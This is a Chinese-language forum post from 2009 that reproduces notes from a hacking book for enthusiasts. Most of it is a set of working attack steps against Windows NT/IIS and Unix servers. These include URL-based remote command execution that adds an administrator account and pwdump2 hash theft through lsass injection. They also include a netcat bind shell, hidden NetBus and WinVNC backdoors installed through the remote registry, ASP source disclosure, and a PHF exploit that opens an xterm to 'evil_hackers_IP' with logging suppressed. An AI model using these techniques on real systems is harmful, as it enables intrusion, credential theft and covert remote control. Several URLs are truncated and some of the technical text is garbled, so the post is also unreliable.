广告广告
  加入我的最爱 设为首页 风格修改
首页 首尾
 手机版   订阅   地图  繁体 
您是第 6221 个阅读者
 
发表文章 发表投票 回覆文章
  可列印版   加为IE收藏   收藏主题   上一主题 | 下一主题   
moi0855
数位造型
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x9 鲜花 x5
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
推文 x0
[心得分享] 美国超级骇客技术
还在用木马等鱼儿上勾,然后用prot扫瞄,或偷窥icp漏洞,或是猜密码,或放或寄病毒网页
等人打开来这些初等或中等的攻击法吗??美国骇客的实力真是另人无法想像,
他们只需利用网址就能轻而意举的主动攻击了,情结不输给电影,我们的手法
对他们而言只是无须大惊小怪的小儿科......参考书为黑红色的网路骇客与系统安全
(好像有新版的,小皇是旧版的,名称与外关差不多)

书籍上的重点,作者是美国着名的网路安全专家,


远端缓冲区溢满{buffer overflow}
缓冲区溢满是发生在程式没有适当的检查输入内容的长度
,而导致缓冲区空间不足,因此,任何预期之外的输入,就会
掩盖掉CPU执行堆叠的其它部分.
远端执行命令取得系统管理者权限
http://www.infowar....nemonix
远端执行一个批次档执行任意的程式
http://www.infowar.co.uk/mnem...overruns.htm

ISSHACK     http://www.e...com
在NT ISS网页伺服器上执行程式码
在本机中可以给使一位使用者加入到区域的管理者群组中的扩权程式
http://www.ntsecurity.net/...tadmin.htm
有相似功能的其它程式   sechole升级版是secholed
http://www.ntsecurity.net...echole.htm
(Domain Admin group) 网域管理者(升级)群组


cmd.exe NT命令解释器
ntuser 程式 用来修改使用者,群组和政策的程式,可参考
http://www.pedesta...re.com

Sechole的启动可靠在一个浏览器输入一个适当的URL连网目标系统,例如下列
我们将Sechole上传至/W3SVC/1/ROOT/SCRIPTS (这里就是C:\inetpub\SCRIPTS)
然后用下面的URL网址启动它
http://192.168.202.154/s...holle.exe
这样做会成功的将IUSR_machine_name帐号加入管理者群组中,我们并没有
IUSR的密码,因此我们为了要避免登入IUSR,通常是在目标系统上开个帐号,
做法是利用ntuser公用程式透过浏览器执行下列复杂的URL(为了方便阅读内容经过装饰)
http://192.168.202.154/sc...xe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret
以上%20再网语中是空白的意思,所以以上网址会被执行为
(cmd /c 会送出ntuser命令到shell,在完成时终结自己)
cmd /c ntuser -s <servername> add <username> -password <password>
以上我们是以corpl做伺服机名称,mallory是使用者名称,secret当密码,
用类似的URL攻击者可以用ntuser帮你把mallory加到管理者群组里,如下 (LORGUP是指某个区域群组)
cmd /c ntuser -s <servername> LORGUP APPEND <groupname> <username>...
http://192.168.202.154/sc...xe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory
同机能的批次档写法如registry,cmd
内容: net localgroup administrators <USER> /add

安全系统ISS目录和一些潜在可行的目录
http://www.iss.net/xforce...vise6.html
以下/W3SVC/1/ROOT通常是指C:\Inetpub\还有News及Mail
/W3SVC/1/ROOT/msade
/W3SVC/1/ROOT/cgi-bin
/W3SVC/1/ROOT/SCRIPTS
/W3SVC/1/ROOT/ISSADMPWD
/W3SVC/1/ROOT/_vti_bin
/W3SVC/1/ROOT/_vti_bin/_vti_adm
/W3SVC/1/ROOT/_vti_bin/_vti_aut
(_vti_bin都是安装Front Page之后衍生出来的)

放批次档的地方
HKLM\software\Microsoft\CurrentVersion
            \RUN [any]
            \AeDebug Debugger
            \WinLogon Userinit

------------------------------------------------------------

执行NT的NT Repair Disk Utility (rdisk) 会在%SYSTEMROOT%\repair
中产生一个压缩过的SAM档叫SAM._ ,还原法: C:\>expand SAM._ SAM
NTFDOS:NTFS驱动软体http://www.sysin...s.com

可破SYSKEY的是Pwdump2   http://www.webspan.n...pwdump2
它可使用DLL注入的方法将自己的程式码插入其它具有更高权限的行程中,
一但注入更高权限的行程之后,这些恶质的执行码就可以自由的内部呼叫API,
来存取SYSKEY加密的密码而不需将其解密.
pwdump2所瞄准的高权限行程是lsass.exe,它是区域安全授权子系统,
Pwd2是将自己注入到lsass的位址空间中,因此在执行Pwdump2之前必需动手
找出lsass.exe的行程边号(PID),以下是用NTRK里的pulist公用程式并将
输出导向find找出lsass.exe的PID为50
(以下C:\代表本机,D:\代表远端主机)
D:\>pulist | find "lsass"
lsass.exe   50   NT AUTHORITY\SYSTEM
现在Pwdump2可以使用PID 50来执行了,预设下会将它的输出
显示在莹慕上,可以很容意的导向一个档案
D:\>pwdump2 50

ASCII无法显示的字元Num Lock)ALT-255或ALT-129

用AT执行远端排程 (双引号)
C:\>at \\192.168.202.44 10:40P""remote /s cmd secret""
        去除可用"[job id] /delete"
远端查时间c:>\sc \\192.168.202.44 start schedule
sc.exe是可启动排程服务 C:>\net time \\192.168.202.44


以下D:\代表本机C:\代表远端
D:\>remote /c 192.168.202.44
secret
C:\>Dir winnt\repair\Sam._
C:\>@Q     (结束用户端)
C:>\@k     (结束伺服端)
但remote不可启动认何用到Win32 console API的程式

remote.exe   /C为用户端     /S为伺服模式

远端监视抓取萤幕http://www.uk.resea...com/vnc
-----------------------------
Netcat
以下是使用command来聆听
-L 不会停止
-d 暗中进行,不会有户动的主控台
-e 是指定启动NT命令的解释器,
远端为C:\TEMP\NC11NT
-p 是指定聆听的通讯阜
C:\TEMP\NT11NT>nc -L -d -e cmd.exe -p 8080
例 C:\TEMP\NT11NT>nc 192.168.202.44 8080
D:\temp\regini -m \\192.168.202.44 netbus.txt

NTRK中的regini.exe可以直接把必要的项目加入到远端的Registry内
REGINI读取文字档当做输入来进行Registry的修改,所以我们必需建立一个
Netbus.txt的档案出来
D:\temp\regini -m \\192.168.202.44 netbus.txt
的档案内容如下     !!!详细请到书局查阅,不知有没有抄正却!!!
HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\Genera
Accept=1
TCPPort=80
Visibility=3     在隐藏模式下执行
AccessMode=2
AutoStart=1     在windows启动时执行

HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\Protection
password=impossible

WinVNC的用法第一部将必要档复制到目标系统(winVNC.exe,VNCHooks.dll,OMNI THREAD_RT.DLL)
2.设定使用此程式的密码,建一个叫WINVNC.INI的档案内容如下
  !!!详细请到书局查阅,不知有没有抄正却!!!
HKEY_USER\.DEFAULT\software\ORL\WinVNC3
SocketConnect=REG_DWORD
0x00000001
password=REG_BINARY 0x00000008

然后使用regini将这些值载入到远端Registry内
C:\>regini -m \\192.168.202.33 winvnc.ini

NTRK的regdmp公用程式是可把Registry转录下来

最后将winVNC安装起来成为伺服程式并启动它,下列的远端命令,(记得这是远端命令)
C:\>WinVNC -install
C:\>net start winvnc

现在我门就可以启动vncviewer程式并和我们的目标连线,
下图是设定连线到"显示0"IP的位置,下一步是密码
___________________________________________
| vncSERVER   |192.168.202.33.0   |v|
===========================================

待续.....

截取修改密码http://www.ntsecurity.net/se...orddll.html
下例是可直接显示原始码,Netscape是存档
http://www.Company.com/scr...asp::$DATE
APS档后面多加句点就有机会看见原始档,或以16进位来破姐修正版
http://www.Company.com...mple.asp.
http://www.Company.com/...ple%2easp
--------------------------------------

一部机器的SID是一串数字,以S-1开头,并以卵横号分成好几段,而最后一祖
的数字称为RID,对于NT内建的使用者与群组都有预先定意的RID,
例如Administrator的RID码一定都是500,而GUEST为501,骇客可用sid2user来找出
已知SID和RID为500来找出管理者的帐号名称(既使改过名称)
C:\>sid2user \\192.168.2.33 8915387 1645822062 18....5 500   (S-1和短横号是省略的)
http://www.chem.msu.su:80...NT/sid.txt
http://www.ntmag.com/Magazine/...rtideID=3143

-----------------------------------------
最佳的xterm
UNIX可在相容的机器上显示X Window,也能透过prot -6063显示在远端的
X伺服器上,然而加上-dispaly参数攻击者可以将他自己的命令介面层导向自己
的X伺服器,可以改良原PHF攻击方式/cgi-bin/phf?Qalias=z%0a/bin/cat%20/etc/passwd
既然攻击者具有在网页伺服器上执行远端命令的能力,只要把这个攻击稍微修改一下
,就可以获取交谈式介面层存取,攻击者要做的是将命令内容中的/bin/cat
/etc/passwd 改成 /usr/X11R6/bin/xterm -ut -dispaly evil_hackers_IP:0.0 完整的命令如下:
/cgi-bin/phf?Qalias=z%0a/usr/X11R6/bin/xterm%20-ut%20-dispaly%20evil_hackers_IP:0.0
上面这个是在远端的网页伺服器就会执行xterm并且显示在攻击者(evil_hackers)的X伺服器上
(视窗ID=0;萤幕ID=0),因为我们加上了-ut参数,因此这个动作并不会被系统记录
下来,这样攻击者跟本不需要登入任何伺服程式就可以获得教谈式介面层存取,
通常我们会使用xterm的完整路径,因为我们攻击展开时,其PATH环境参数不一定设定
符合我们的需求,使用完整路径才能却保网页伺服器可以顺利找到xterm执行档

===================================================

port   service
7   echo
9   discard
13   daytime
19   Chargen
21   ftp
22   ssh
23   telnet
25   smtp
25   smap
37   time
53   dns
79   finger
80   http
110   pop3
111   sunrpc
139   netbois
143   imap
443   https
512   exec
513   login
514   shell
2049   nfs
4045   lockd
31337   UDP (BO)
12345   TCP (NetBus)
1394   DVD
31337   unassigned
12345   unassigned

135-139     UPD和TCP/IP

LINUX用网路结构探勘工具http://www.marko...heops
超级抓站软体http://www.blighty.co...ts/spade的Sam Spade还有Crawl,Website
泄漏档案内容,只要攻击者知道档案位置并以非标准的URL送出要求....
http://www.microsoft.com/secur.../ms99-010.asp

网路007     http://www.sam....org/
作叶系统探知器Queso   http://www.apostols...ojectz/
网路源由结构图http://www.visu...e.com的VisualRoute
网路结构探索工具http://www.marko...heops
http://www.home.cs.utwen...enw/scotty的Tkined原本是Scotty函式库的一部份
Nnmap的更新工具http://www.insecure.org:80/...-submit.cgi
http://www.remotel...re.com网页NT管理工具Remotely Anywhere
2.Remotely Possible / Control IT   http://www....com的Control IT可在Windows,Linux,Solaris上用
http://www.uk.resea...com/Vnc


queue处理器的伫列
dual-homed两栖主机
HTML换行码%0a
HTML空格码%20
Virtual虚拟
Private丝人
back channel回传通道 ,定意:一个通讯管道起始端为目标系统而非攻击端
shared library共享函式库
signal信号
aliase化名



献花 x0 回到顶端 [楼 主] From:欧洲 | Posted:2009-10-21 23:23 |

首页  发表文章 发表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.055656 second(s),query:15 Gzip disabled
本站由 瀛睿律师事务所 担任常年法律顾问 | 免责声明 | 本网站已依台湾网站内容分级规定处理 | 连络我们 | 访客留言